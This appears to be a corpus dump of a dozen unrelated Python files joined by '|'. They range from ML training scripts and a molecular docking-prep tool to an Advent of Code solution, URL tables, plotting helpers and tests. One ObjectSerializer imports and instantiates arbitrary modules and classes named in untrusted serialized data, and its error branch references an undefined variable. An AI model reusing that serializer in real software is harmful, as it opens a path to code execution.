model.summary()
model.fit_generator(generator = gen_train, validation_data = gen_val,
steps_per_epoch = steps_per_epoch, validation_steps = validation_steps, epochs = epochs, callbacks = callbacks,
use_multiprocessing = use_multiprocessing, workers = workers, max_queue_size = max_queue_size, initial_epoch = initial_epoch)
gen_train.save_trace_sampling(os.path.join(sub_folder, path_logs, 'trace_sampling.npy'))
def test(caps_block_value, conv_block_value, feature_value, experiment_id):
# Set Mode Value
mode_value = Mode.test.value
# Get capsule model group
caps_block_group = caps_block_get_group(caps_block_value)
# Config generator
gen_test = DatasetGenerator(batch_size = 1, image_size = (h, w), shuffle = True, dataset_value = Dataset.test.value)
inputs = gen_test.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
# Subfolder
sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id)
# Mkdir (with test_id)
test_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S')
path_tests_full = os.path.join(sub_folder, path_tests, test_id)
if not os.path.exists(path_tests_full):
os.makedirs(path_tests_full)
# Copy config file to path_tests_full folder
copyfile(config.__file__, os.path.join(path_tests_full, 'config_test.py'))
# Model
model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs)
model.summary()
# Loop over model weights (if multiple)
path_model_filenames = sorted([item for item in os.listdir(os.path.join(sub_folder, path_checkpoints)) if item.endswith('.h5')])
for path_model_filename in path_model_filenames:
# Model: load weights
print('\n\nTEST CKPT: ' + path_model_filename + '\n\n')
path_model = os.path.join(sub_folder, path_checkpoints, path_model_filename)
model.load_weights(path_model, by_name = load_weights_by_name)
# Scores
scores = model.evaluate_generator(generator = gen_test, steps = steps, use_multiprocessing = use_multiprocessing,
workers = workers, max_queue_size = max_queue_size, verbose = 1)
# Save
scores_filename = 'scores.json' if len(path_model_filenames) == 1 else 'scores-{}.json'.format(os.path.splitext(path_model_filename)[0])
with open(os.path.join(path_tests_full, scores_filename), 'w') as f:
json.dump(dict(zip(model.metrics_names, list(scores))), f, indent = 4)
def predict(caps_block_value, conv_block_value, feature_value, experiment_id, do_visual):
# Set Mode Value
mode_value = Mode.predict.value
# Get capsule model group
caps_block_group = caps_block_get_group(caps_block_value)
# Config generator
gen_predict = DatasetGenerator(batch_size = 1, image_size = (h, w), shuffle = shuffle_pred, dataset_value = Dataset.predict.value)
inputs = gen_predict.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
# Subfolder
sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id)
# Mkdir (with prediction_id)
prediction_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S')
path_predictions_full = os.path.join(sub_folder, path_predictions, prediction_id)
if not os.path.exists(path_predictions_full):
os.makedirs(path_predictions_full)
# Copy config file to path_predictions_full folder
copyfile(config.__file__, os.path.join(path_predictions_full, 'config_predict.py'))
# Model
path_model = os.path.join(sub_folder, path_checkpoints, 'weights.h5')
model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, path_model = path_model)
model.summary()
# Build pipeline of predictions: predict, write results, etc.
if do_pipeline_predictions:
gen_predict.pipeline_predictions(model, path_predictions_full, do_visual, steps_pred)
# Build pipeline of hidden representations: compute, write results, etc.
if do_pipeline_hidden:
gen_predict.pipeline_hidden(model, path_predictions_full)
if __name__ == "__main__":
# Parse args
parser = argparse.ArgumentParser()
parser.add_argument('--mode', '-m', help = 'Mode of execution', type = Mode, choices = list(Mode))
parser.add_argument('--feature', '-f', help = 'Feature from dataset', type = Feature, choices = list(Feature), default = Feature.all)
parser.add_argument('--conv_block', help = 'ConvBlock model', type = str, choices = list(ApiConvBlocks), default = NO_CONV_BLOCK)
parser.add_argument('--caps_block', help = 'CapsBlock model', type = str, choices = list(ApiCapsBlocks_flatten), default = NO_CAPS_BLOCK)
parser.add_argument('--experiment_id', help = '[TEST/PREDICT] Experiment ID is defined as experiment folder name (provided as a date)', type = str)
parser.add_argument('--do_visual', help = '[PREDICT] If used, save visual predictions along with metrics file', action = 'store_true')
args = parser.parse_args()
# Train
if args.mode == Mode.train:
train(args.caps_block, args.conv_block, args.feature.value)
# Test
if args.mode == Mode.test:
test(args.caps_block, args.conv_block, args.feature.value, args.experiment_id)
# Predict
if args.mode == Mode.predict:
predict(args.caps_block, args.conv_block, args.feature.value, args.experiment_id, args.do_visual)
|
import helpers
def combine_mask(mask, i):
p = 35
o = 0
m = 1
while p >= 0:
v = i % 2
i = int(i/2)
if (v == 1 and mask[p] == 'X') or mask[p] == '1':
o += m
m = m*2
p -= 1
return o
def calc_sum(input):
mem = {}
for i in input:
if 'mask' in i:
mask = i.split(' = ')[1]
elif 'mem' in i:
v = int(i.split(' = ')[1])
a = int(i.split('mem[', 1)[1].split(']', 1)[0])
mem[a] = combine_mask(mask, v)
s = 0
for m in mem:
s += mem[m]
return s
def combine_mask2(mask, i):
p = 35
base = 0
m = 1
xpos = []
while p >= 0:
v = i % 2
i = int(i/2)
if mask[p] == 'X':
xpos.append(m)
else:
if v == 1 or mask[p] == '1':
base += m
m = m*2
p -= 1
memlocs = []
for a in range(0, pow(2, len(xpos))):
p = 0
m = base
d = a
while d > 0:
if (d % 2):
m += xpos[p]
p += 1
d = int(d/2)
memlocs.append(m)
return memlocs
def calc_sum2(input):
mem = {}
for i in input:
if 'mask' in i:
mask = i.split(' = ')[1]
elif 'mem' in i:
v = int(i.split(' = ')[1])
a = int(i.split('mem[', 1)[1].split(']', 1)[0])
for m in combine_mask2(mask, a):
mem[m] = v
s = 0
for m in mem:
s += mem[m]
return s
test_inp = helpers.read_file_as_array_str(
'./inputs_test_day14.txt')
test_res = calc_sum(test_inp)
if test_res != 165:
print(f'algorithm part 1 not working...yet')
exit()
inp = helpers.read_file_as_array_str(
'./inputs_day14.txt')
res = calc_sum(inp)
print('part 1', res)
test_inp2 = helpers.read_file_as_array_str(
'./inputs_test_day14b.txt')
test_res2 = calc_sum2(test_inp2)
if test_res2 != 208:
print(f'algorithm part 1 not working...yet')
exit()
res = calc_sum2(inp)
print('part 2', res)
|
#!/usr/bin/env python
__author__="Thomas Evangelidis"
__email__="[email protected]"
import os
from argparse import ArgumentParser, RawDescriptionHelpFormatter
## Parse command line arguments
def cmdlineparse():
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description="""
DESCRIPTION:
This is a Python script to prepare the receptor-ligand complex for scoring. If you encounter problems with the input pdb file then try correcting it using:
1) pdb4amber from AmberTools (https://github.com/Amber-MD/pdb4amber)
2) pdbfixer (https://github.com/pandegroup/pdbfixer)
TODO: add optional support for LYS and CYS protonated forms.
https://www.cgl.ucsf.edu/chimera/docs/ContributedSoftware/addh/addh.html
""",
epilog="""
### EXAMPLE 1:
pychimera $(which dockprep.py) -complex 3K5C-BACE_150_complex.pdb -cmethod gas -neut
""")
parser.add_argument("-complex", dest="COMPLEX", required=False, default=None, type=str,
help="pdb file with the holo form of the receptor.")
parser.add_argument("-cmethod", dest="CHARGE_METHOD", required=False, default='gas', type=str, choices=['gas', 'am1'],
help="Method to calculate charges fo the ligand. Default: %(default)s")
parser.add_argument("-neut", dest="NEUTRALIZE", required=False, default=False, action='store_true',
help="Neutralize the system by adding coutner ions.")
parser.add_argument("-stripions", dest="STRIP_IONS", required=False, default=False, action='store_true',
help="Strip out all ions.")
parser.add_argument("-rec", dest="RECEPTOR", required=False, default=None, type=str,
help="Instead of -complex give the pdb file with the apo form of the receptor.")
parser.add_argument("-lig", dest="LIGAND", required=False, default=None, type=str,
help="Instead of -complex give an sdf or mol2 file with optimized ligand structure from which to find the "
"binding site residues.")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = cmdlineparse()
import chimera
from chimera import runCommand as rc
from Addions import initiateAddions
from DockPrep import prep
from AddCharge import estimateFormalCharge
from chimera.selection import currentResidues
if args.COMPLEX:
rc("open %s" % args.COMPLEX) # load the protein-ligand complex
if args.STRIP_IONS:
rc("delete ions")
rc("split #0 ligands")
rc("sel #0.2") # select the ligand
ligres = currentResidues()[0]
ligres.type = 'LIG' # change the resname of the ligand to 'LIG'
rc("combine #0.1 modelId 1") # create a new molecule containing just the receptor
rc("combine #0.2 modelId 2") # create a new molecule containing just the ligand
# Now that we calculated the charges of the protein and the ligand, we just need the complex
rc("combine #1,2 modelId 3") # create a new molecule containing the protein-ligand complex
rc("del #0-2")
pdb = args.COMPLEX.replace(".pdb", "_prep.pdb")
elif args.RECEPTOR and args.LIGAND:
rc("open %s" % args.RECEPTOR) # load the receptor
rc("open %s" % args.LIGAND) # load the ligand
if args.STRIP_IONS:
rc("delete ions")
rc("sel #1") # select the ligand
ligres = currentResidues()[0]
ligres.type = 'LIG' # change the resname of the ligand to 'LIG'
rc("combine #0,1 modelId 2") # create a new molecule containing the protein-ligand complex
rc("combine #2 modelId 3") # create a new molecule containing the protein-ligand complex
rc("del #0-2")
pdb = os.path.splitext(os.path.basename(args.RECEPTOR))[0] + "_" + os.path.splitext(os.path.basename(args.LIGAND))[0] + "_prep.pdb"
print("Preparing receptor for docking and calculating ligand '%s' charges (may be slow)." % args.CHARGE_METHOD)
models = chimera.openModels.list(modelTypes=[chimera.Molecule])
prep(models, nogui=True, method=args.CHARGE_METHOD)
net_charge = estimateFormalCharge(models[0].atoms)
# Neutralize system
if args.NEUTRALIZE:
if net_charge < 0:
initiateAddions(models, "Na+", "neutralize", chimera.replyobj.status)
elif net_charge > 0:
initiateAddions(models, "Cl-", "neutralize", chimera.replyobj.status)
if net_charge != 0:
# change the resids of the ions, which by default they are all 1
rc("sel ~ions")
existing_resids = [int(str(r.id).split('.')[0]) for r in currentResidues()]
start = max(existing_resids) + 2
rc("resrenumber %i ions" % start) # renumber the resids of the added ions
# change the resid of the ligand
rc('sel #3 & ~ #3:LIG')
existing_resids = [int(str(r.id).split('.')[0]) for r in currentResidues()]
start = max(existing_resids) + 2
rc("resrenumber %i #3:LIG" % start)
rc("combine #3 modelId 4") # create a new molecule to split it into receptor and ligand
rc("split #4 atoms ~#4:LIG")
rc("combine #4.1 modelId 5") # create a new molecule containing just the receptor
rc("combine #4.2 modelId 6") # create a new molecule containing just the ligand
models = chimera.openModels.list(modelTypes=[chimera.Molecule])
# for m in models: print(len(m.atoms), estimateFormalCharge(m.atoms) # DEBUGGING
rec_charge = estimateFormalCharge(models[3].atoms)
lig_charge = estimateFormalCharge(models[4].atoms)
rc("del #4-6")
# Finally, write the complex pdb file with headers
rc("changechains B A all") # <== OPTIONAL (ligand and protein will be chain A for homology modeling)
rc("write format pdb #3 %s" % pdb)
with open(pdb, "r+") as f:
s = f.read()
f.seek(0)
f.write("# receptor net charge = %i\n# ligand net charge = %i\n" % (rec_charge, lig_charge)) # after system neutralization
f.write(s)
|
import torch
import torch.nn as nn
import re
class TaskCompositionBlockV1(nn.Module):
"""
This block takes the input features and conditions them with respect to
the Task Palette embedding computed with the task representation block.
"""
def __init__(self, cfg_txt, in_channels, out_channels, dim_latent_w, ks, **kwargs):
super().__init__()
# Convolutional layer
pd = ks // 2
self.conv1 = nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=ks,
padding=pd
)
# Spatial task conditioning
self.spatial_cond = SpatialAffineCond(
cfg_txt=cfg_txt,
dim_latent_w=dim_latent_w,
n_out_ch=out_channels
)
# Activation - leaky relu
self.act = nn.LeakyReLU()
def forward(self, feature_map, latent_w_tensor, **kwargs):
result = self.conv1(feature_map)
result = self.spatial_cond(
feature_map=result,
latent_w_tensor=latent_w_tensor
)
result = self.act(result)
return result
class SpatialAffineCond(nn.Module):
"""
Applies normalization with statitstics in a BatchNorm fashion
followed with the affine transformation spatial task-wise encoding
Implmenetation was taken over and modified from:
https://github.com/NVlabs/SPADE/blob/master/models/networks/normalization.py
"""
def __init__(self, cfg_txt, dim_latent_w, n_out_ch):
super().__init__()
# Parse the configuration text that says which norm's
# statistical normalization to use and which filter size
# to use for computing the affine transformation parameters.
assert cfg_txt.startswith('cond')
parsed = re.search('cond_(\D+)(\d)x\d_hid(\d+)', cfg_txt)
param_free_norm_type = str(parsed.group(1))
ks = int(parsed.group(2))
pw = ks // 2
n_hidden = int(parsed.group(3))
# Choose the appropriate parameter free normalization
if param_free_norm_type == 'instance':
self.param_free_norm = nn.InstanceNorm2d(
num_features=n_out_ch,
affine=False
)
elif param_free_norm_type == 'batch':
self.param_free_norm = nn.BatchNorm2d(
num_features=n_out_ch,
affine=False
)
# elif param_free_norm_type == 'syncbatch':
# self.param_free_norm = SynchronizedBatchNorm2d(norm_nc, affine=False)
else:
raise NotImplementedError
# Computes intermediate embedding space
self.conv_shared = nn.Sequential(
nn.Conv2d(
in_channels=dim_latent_w,
out_channels=n_hidden,
kernel_size=ks,
padding=pw,
bias=True
),
nn.LeakyReLU()
)
# Layers which apply the affine transformation conditioning
self.affine_beta = torch.nn.Conv2d(
in_channels=n_hidden,
out_channels=n_out_ch,
kernel_size=ks,
stride=1,
padding=pw,
bias=True
)
self.affine_gamma = torch.nn.Conv2d(
in_channels=n_hidden,
out_channels=n_out_ch,
kernel_size=ks,
stride=1,
padding=pw,
bias=True
)
# Bias initialization
self.affine_beta.bias.data[:] = 0
self.affine_gamma.bias.data[:] = 1
def forward(self, feature_map, latent_w_tensor):
# Pass the latent code w map through a conv layer
spat_w_code = self.conv_shared(latent_w_tensor)
# Compute affine conditioning tensors
# (conditioned on the task palette embedding map w)
spat_gamma = self.affine_gamma(spat_w_code)
spat_beta = self.affine_beta(spat_w_code)
return self.param_free_norm(feature_map) * spat_gamma + spat_beta
|
search_engine = {
'나무위키': 'https://namu.wiki/w/',
'리브레위키': 'https://librewiki.net/wiki/',
'백괴사전': 'https://uncyclopedia.kr/wiki/',
'위키백과': 'https://ko.wikipedia.org/wiki/',
'진보위키': 'https://jinbowiki.org/wiki/index.php/',
'구스위키': 'http://goos.wiki/index.php?title=',
'구글': 'https://www.google.co.kr/search?q=',
'네이버': 'https://search.naver.com/search.naver?query=',
'스팀': 'http://store.steampowered.com/search/?term='
}
direct_url = {
'나무위키': 'https://namu.wiki/w/',
'리브레위키': 'https://librewiki.net/wiki/',
'백괴사전': 'https://uncyclopedia.kr/wiki/',
'위키백과': 'https://ko.wikipedia.org/wiki/',
'진보위키': 'https://jinbowiki.org/wiki/index.php/',
'구스위키': 'http://goos.wiki/index.php',
'구글': 'https://www.google.co.kr/',
'네이버': 'https://search.naver.com/',
'애니플러스': 'http://www.aniplustv.com',
'트위터': 'https://twitter.com/',
'페이스북': 'https://www.facebook.com/',
'유튜브': 'https://www.youtube.com/',
'구글플레이스토어': 'https://play.google.com/store',
'애니맥스플러스': 'http://www.animaxplus.co.kr',
'트위치': 'http://www.twitch.tv',
'애스크FM': 'http://www.ask.fm',
'배틀넷': 'http://www.blizzard.com/ko-kr/',
'행아웃': 'https://hangouts.google.com',
'텔레그램': 'https://web.telegram.org/',
'디스코드': 'https://discordapp.com/',
'스카이프': 'https://web.skype.com/',
'파파고': 'https://papago.naver.com/',
'구글번역기': 'https://translate.google.co.kr/?hl=ko',
'텀블벅': 'https://tumblbug.com/',
'킥스타터': 'https://www.kickstarter.com/',
'G마켓': 'http://www.gmarket.co.kr/',
'옥션': 'http://www.auction.co.kr/',
'에버노트': 'https://evernote.com/intl/ko',
'픽시브': 'https://www.pixiv.net/?lang=ko',
'알파위키': 'https://alphawiki.org'
}
hentai_url = {
'히토미': 'https://hitomi.la',
'익헨': 'https://e-hentai.org/'
} |
from datetime import datetime
from distutils.util import strtobool
import numpy as np
import pandas as pd
# Converts the contents in a .tsf file into a dataframe and returns
# it along with other meta-data of the dataset:
# frequency, horizon, whether the dataset contains missing values and whether the series have equal lengths
#
# Parameters
# full_file_path_and_name - complete .tsf file path
# replace_missing_vals_with - a term to indicate the missing values in series in the returning dataframe
# value_column_name - Any name that is preferred to have as the name of the column containing series values in the returning dataframe
def convert_tsf_to_dataframe(
full_file_path_and_name,
replace_missing_vals_with="NaN",
value_column_name="series_value",
):
col_names = []
col_types = []
all_data = {}
line_count = 0
frequency = None
forecast_horizon = None
contain_missing_values = None
contain_equal_length = None
found_data_tag = False
found_data_section = False
started_reading_data_section = False
with open(full_file_path_and_name, "r", encoding="cp1252") as file:
for line in file:
# Strip white space from start/end of line
line = line.strip()
if line:
if line.startswith("@"): # Read meta-data
if not line.startswith("@data"):
line_content = line.split(" ")
if line.startswith("@attribute"):
if len(line_content) != 3: # Attributes have both name and type
raise ValueError("Invalid meta-data specification.")
col_names.append(line_content[1])
col_types.append(line_content[2])
else:
if len(line_content) != 2: # Other meta-data have only values
raise ValueError("Invalid meta-data specification.")
if line.startswith("@frequency"):
frequency = line_content[1]
elif line.startswith("@horizon"):
forecast_horizon = int(line_content[1])
elif line.startswith("@missing"):
contain_missing_values = bool(strtobool(line_content[1]))
elif line.startswith("@equallength"):
contain_equal_length = bool(strtobool(line_content[1]))
else:
if len(col_names) == 0:
raise ValueError("Missing attribute section. Attribute section must come before data.")
found_data_tag = True
elif not line.startswith("#"):
if len(col_names) == 0:
raise ValueError("Missing attribute section. Attribute section must come before data.")
elif not found_data_tag:
raise ValueError("Missing @data tag.")
else:
if not started_reading_data_section:
started_reading_data_section = True
found_data_section = True
all_series = []
for col in col_names:
all_data[col] = []
full_info = line.split(":")
if len(full_info) != (len(col_names) + 1):
raise ValueError("Missing attributes/values in series.")
series = full_info[len(full_info) - 1]
series = series.split(",")
if len(series) == 0:
raise ValueError(
"A given series should contains a set of comma separated numeric values. At least one numeric value should be there in a series. Missing values should be indicated with ? symbol"
)
numeric_series = []
for val in series:
if val == "?":
numeric_series.append(replace_missing_vals_with)
else:
numeric_series.append(float(val))
if numeric_series.count(replace_missing_vals_with) == len(numeric_series):
raise ValueError(
"All series values are missing. A given series should contains a set of comma separated numeric values. At least one numeric value should be there in a series."
)
all_series.append(np.array(numeric_series, dtype=np.float32))
for i in range(len(col_names)):
att_val = None
if col_types[i] == "numeric":
att_val = int(full_info[i])
elif col_types[i] == "string":
att_val = str(full_info[i])
elif col_types[i] == "date":
att_val = datetime.strptime(full_info[i], "%Y-%m-%d %H-%M-%S")
else:
raise ValueError(
"Invalid attribute type."
) # Currently, the code supports only numeric, string and date types. Extend this as required.
if att_val is None:
raise ValueError("Invalid attribute value.")
else:
all_data[col_names[i]].append(att_val)
line_count = line_count + 1
if line_count == 0:
raise ValueError("Empty file.")
if len(col_names) == 0:
raise ValueError("Missing attribute section.")
if not found_data_section:
raise ValueError("Missing series information under data section.")
all_data[value_column_name] = all_series
loaded_data = pd.DataFrame(all_data)
return (
loaded_data,
frequency,
forecast_horizon,
contain_missing_values,
contain_equal_length,
)
def convert_multiple(text: str) -> str:
if text.isnumeric():
return text
if text == "half":
return "0.5"
def frequency_converter(freq: str):
parts = freq.split("_")
if len(parts) == 1:
return BASE_FREQ_TO_PANDAS_OFFSET[parts[0]]
if len(parts) == 2:
return convert_multiple(parts[0]) + BASE_FREQ_TO_PANDAS_OFFSET[parts[1]]
raise ValueError(f"Invalid frequency string {freq}.")
BASE_FREQ_TO_PANDAS_OFFSET = {
"seconds": "S",
"minutely": "T",
"minutes": "T",
"hourly": "H",
"hours": "H",
"daily": "D",
"days": "D",
"weekly": "W",
"weeks": "W",
"monthly": "M",
"months": "M",
"quarterly": "Q",
"quarters": "Q",
"yearly": "Y",
"years": "Y",
}
# Example of usage
# loaded_data, frequency, forecast_horizon, contain_missing_values, contain_equal_length = convert_tsf_to_dataframe("TSForecasting/tsf_data/sample.tsf")
# print(loaded_data)
# print(frequency)
# print(forecast_horizon)
# print(contain_missing_values)
# print(contain_equal_length)
|
from .baseserializer import BaseSerializer
class ObjectSerializer(BaseSerializer):
def __init__(self, obj_types, class_identifiers_in_params=False):
super().__init__(obj_types, '^!Class\((([a-zA-Z_][0-9a-zA-Z_]*)\.([a-zA-Z_][0-9a-zA-Z_]*))?\)$')
self.class_identifiers_in_params = class_identifiers_in_params
def serialize(self, obj):
if self.class_identifiers_in_params is True:
result = {
'!Class()': {
'__module__': obj.__module__,
'__class__': obj.__class__.__name__,
**obj.__dict__
}
}
else:
result = { '!Class({}.{})'.format(obj.__module__, obj.__class__.__name__, ): { **obj.__dict__ } }
return result
def deserialize(self, serialized_obj):
# structure should be like this: { '!Object(Module.Class)': { ... params ... } } so only one item in the dict
try:
k, v = list(serialized_obj.items())[0]
except:
return obj
import re
r = re.match(self.id_regex, k)
if not r:
return serialized_obj
if r.groups()[0] is None and '__class__' in v and '__module__' in v:
module_name = v.pop("__module__")
class_name = v.pop("__class__")
elif r.groups()[0] is not None and r.groups()[1] is not None and r.groups()[2] is not None:
module_name = r.groups()[1]
class_name = r.groups()[2]
module = __import__(module_name)
cls = getattr(module, class_name)
obj = cls(**v)
return obj
|
from pypy.module.thread.test.support import GenericTestThread
class AppTestLocal(GenericTestThread):
def test_local_1(self):
import thread
from thread import _local as tlsobject
freed = []
class X:
def __del__(self):
freed.append(1)
ok = []
TLS1 = tlsobject()
TLS2 = tlsobject()
TLS1.aa = "hello"
def f(i):
success = False
try:
a = TLS1.aa = i
b = TLS1.bbb = X()
c = TLS2.cccc = i*3
d = TLS2.ddddd = X()
self.busywait(0.05)
assert TLS1.aa == a
assert TLS1.bbb is b
assert TLS2.cccc == c
assert TLS2.ddddd is d
success = True
finally:
ok.append(success)
for i in range(20):
thread.start_new_thread(f, (i,))
self.waitfor(lambda: len(ok) == 20, delay=3)
assert ok == 20*[True] # see stdout/stderr for failures in the threads
self.waitfor(lambda: len(freed) >= 40)
assert len(freed) == 40
# in theory, all X objects should have been freed by now. Note that
# Python's own thread._local objects suffer from the very same "bug" that
# tls.py showed originally, and leaves len(freed)==38: the last thread's
# __dict__ remains stored in the TLS1/TLS2 instances, although it is not
# really accessible any more.
assert TLS1.aa == "hello"
def test_local_init(self):
import thread
tags = [1, 2, 3, 4, 5, 54321]
seen = []
class X(thread._local):
def __init__(self, n):
assert n == 42
self.tag = tags.pop()
x = X(42)
assert x.tag == 54321
def f():
seen.append(x.tag)
for i in range(5):
thread.start_new_thread(f, ())
self.waitfor(lambda: len(seen) == 5, delay=2)
seen1 = seen[:]
seen1.sort()
assert seen1 == [1, 2, 3, 4, 5]
assert tags == []
def test_local_setdict(self):
import thread
x = thread._local()
raises(TypeError, "x.__dict__ = 42")
done = []
def f(n):
x.spam = n
assert x.__dict__["spam"] == n
x.__dict__ = {"bar": n+1}
assert x.bar == n+1
assert not hasattr(x, "spam")
done.append(1)
for i in range(5):
thread.start_new_thread(f, (i,))
self.waitfor(lambda: len(done) == 5, delay=2)
assert len(done) == 5
|
# -*- coding: utf-8 -*-
from flask import Flask
from flask_socketio import SocketIO
from services import facial_recognition, brightness_detector, face_detector, object_detector, pose_estimation
import configparser
config = configparser.ConfigParser()
config.read("secret.ini")
app = Flask(__name__)
PORT = config.get("APP", "PORT")
DEBUG = config.get("APP", "DEBUG") == "True"
app.config["SECRET_KEY"] = config.get("APP", "SECRET_KEY")
socketio = SocketIO(app)
@socketio.on("face verification")
def face_verification(image1, image2):
try:
response = facial_recognition.facial_verification_for_auth(
image1=image1, image2=image2
)
return response
except:
return False
@socketio.on("brightness detector")
def brightness_validator(image):
try:
response = brightness_detector.detect_brightness(image)
return response
except:
return False
@socketio.on("face detector")
def face_detection(image):
try:
response = face_detector.face_detector(image)
return response
except:
return False, "No face is detected"
@socketio.on("object detector")
def object_detection(image):
try:
# response = object_detector.object_detection(image)
return False
except:
return False
@socketio.on("pose detector")
def pose_detection(image):
try:
response = pose_estimation.pose_estimation(image)
print(response)
return response
except:
return True, ""
if __name__ == "__main__":
socketio.run(app, debug=DEBUG, port=PORT) |
# -*- coding: utf-8 -*-
"""Convenience visual methods"""
import numpy as np
import matplotlib.pyplot as plt
def imshow(data, title=None, show=1, cmap=None, norm=None, complex=None, abs=0,
w=None, h=None, ridge=0, ticks=1, yticks=None, aspect='auto', **kw):
kw['interpolation'] = kw.get('interpolation', 'none')
if norm is None:
mx = np.max(np.abs(data))
vmin, vmax = ((-mx, mx) if not abs else
(0, mx))
else:
vmin, vmax = norm
if cmap is None:
cmap = 'bone' if abs else 'bwr'
_kw = dict(vmin=vmin, vmax=vmax, cmap=cmap, aspect=aspect, **kw)
if abs:
plt.imshow(np.abs(data), **_kw)
else:
if (complex is None and np.sum(np.abs(np.imag(data))) < 1e-8) or (
complex is False):
plt.imshow(data.real, **_kw)
else:
fig, axes = plt.subplots(1, 2)
axes[0].imshow(data.real, **_kw)
axes[0].imshow(data.imag, **_kw)
plt.subplots_adjust(left=0, right=1, bottom=0, top=1,
wspace=0, hspace=0)
if w or h:
plt.gcf().set_size_inches(14 * (w or 1), 8 * (h or 1))
if ridge:
data_mx = np.where(np.abs(data) == np.abs(data).max(axis=0))
plt.scatter(data_mx[1], data_mx[0], color='r', s=4)
if not ticks:
plt.xticks([])
plt.yticks([])
if yticks is not None:
idxs = np.linspace(0, len(yticks) - 1, 8).astype('int32')
yt = ["%.2f" % h for h in yticks[idxs]]
plt.yticks(idxs, yt)
_maybe_title(title)
if show:
plt.show()
def plot(x, y=None, title=None, show=0, ax_equal=False, complex=0,
w=None, h=None, **kw):
if y is None:
y = x
x = np.arange(len(x))
if complex:
plt.plot(x, y.real, **kw)
plt.plot(x, y.imag, **kw)
else:
plt.plot(x, y, **kw)
_maybe_title(title)
_scale_plot(plt.gcf(), plt.gca(), show=show, ax_equal=ax_equal, w=w, h=h)
def scat(x, y=None, title=None, show=0, ax_equal=False, s=18, w=None, h=None,
**kw):
if y is None:
y = x
x = np.arange(len(x))
plt.scatter(x, y, s=s, **kw)
_maybe_title(title)
_scale_plot(plt.gcf(), plt.gca(), show=show, ax_equal=ax_equal, w=w, h=h)
def hist(x, bins=500, title=None, show=0, stats=0):
x = np.asarray(x)
_ = plt.hist(x.ravel(), bins=bins)
_maybe_title(title)
if show:
plt.show()
if stats:
mu, std, mn, mx = (x.mean(), x.std(), x.min(), x.max())
print("(mean, std, min, max) = ({}, {}, {}, {})".format(
*_fmt(mu, std, mn, mx)))
return mu, std, mn, mx
def _fmt(*nums):
return [(("%.3e" % n) if (abs(n) > 1e3 or abs(n) < 1e-3) else
("%.3f" % n)) for n in nums]
def _maybe_title(title):
if title is not None:
plt.title(str(title), loc='left', weight='bold', fontsize=15)
def _scale_plot(fig, ax, show=False, ax_equal=False, w=None, h=None):
xmin, xmax = ax.get_xlim()
rng = xmax - xmin
ax.set_xlim(xmin + .018 * rng, xmax - .018 * rng)
if w or h:
fig.set_size_inches(14*(w or 1), 8*(h or 1))
if ax_equal:
yabsmax = max(np.abs([*ax.get_ylim()]))
mx = max(yabsmax, max(np.abs([xmin, xmax])))
ax.set_xlim(-mx, mx)
ax.set_ylim(-mx, mx)
fig.set_size_inches(8*(w or 1), 8*(h or 1))
if show:
plt.show()
def plotenergy(x, axis=1, **kw):
plot(np.sum(np.abs(x) ** 2, axis=axis), **kw)
|
import sys
import json
sys.path.insert(0, '../osspeak')
from recognition.rules import astree, _lark
from recognition import lark_parser
from recognition.lark_parser import utterance_grammar
def utterance_from_text(text):
lark_ir = utterance_grammar.parse(text)
utterance_from_lark_ir = astree.utterance_from_lark_ir(lark_ir)
return utterance_from_lark_ir
def test_hello_world():
text = 'hello world'
def test_top_level_grouping():
text = 'hello world | goodbye universe'
def test_reference():
text = 'a number <digit>'
def test_range():
text = 'hello_3-5'
def test_fixed_repetition():
text = 'hello_3'
def test_nested_grouping():
text = 'hello world | goodbye (universe | solar system)'
def test_action_substitute2():
text = "question = how are you | fruit = i like apples"
utterance = utterance_from_text(text)
assert_equal(utterance, {
"root": {
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"sequences": [
[
{
"action_substitute": {
"type": "Literal",
"value": "how are you"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "question",
"type": "WordNode"
},
],
[
{
"action_substitute": {
"type": "Literal",
"value": "i like apples"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "fruit",
"type": "WordNode"
},
]
],
"type": "GroupingNode"
},
"type": "Rule"
})
def test_action_substitute():
text = "go to (google='http://google.com' | reddit='http://reddit.com')"
utterance = utterance_from_text(text)
assert_equal(utterance, {
"root": {
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"sequences": [
[
{
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"text": "go",
"type": "WordNode"
},
{
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"text": "to",
"type": "WordNode"
},
{
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"sequences": [
[
{
"action_substitute": {
"type": "String",
"value": "http://google.com"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "google",
"type": "WordNode"
}
],
[
{
"action_substitute": {
"type": "String",
"value": "http://reddit.com"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "reddit",
"type": "WordNode"
}
]
],
"type": "GroupingNode"
}
]
],
"type": "GroupingNode"
},
"type": "Rule"
})
def pretty(d, indent=0):
for key, value in d.items():
print('\t' * indent + str(key))
if isinstance(value, dict):
pretty(value, indent+1)
else:
print('\t' * (indent+1) + str(value))
def utterance_from_text(text):
lark_ir = lark_parser.parse_utterance(text)
return astree.utterance_from_lark_ir(lark_ir)
def to_clipboard(utterance):
import recognition.actions.library.clipboard
s = to_json_string(utterance)
formatted = to_json_string(json.loads(s))
recognition.actions.library.clipboard.set(formatted.replace('null', 'None').replace('false', 'False').replace('true', 'True'))
def to_json_string(node):
return json.dumps(node, cls=SimpleJsonEncoder, sort_keys=True, indent=4)
def assert_equal(utterance, json_value):
assert json.loads(to_json_string(utterance)) == json_value
class SimpleJsonEncoder(json.JSONEncoder):
def default(self, o):
d = o.__dict__.copy()
d['type'] = o.__class__.__name__
return d |
from . import PresenterBase
# import releases
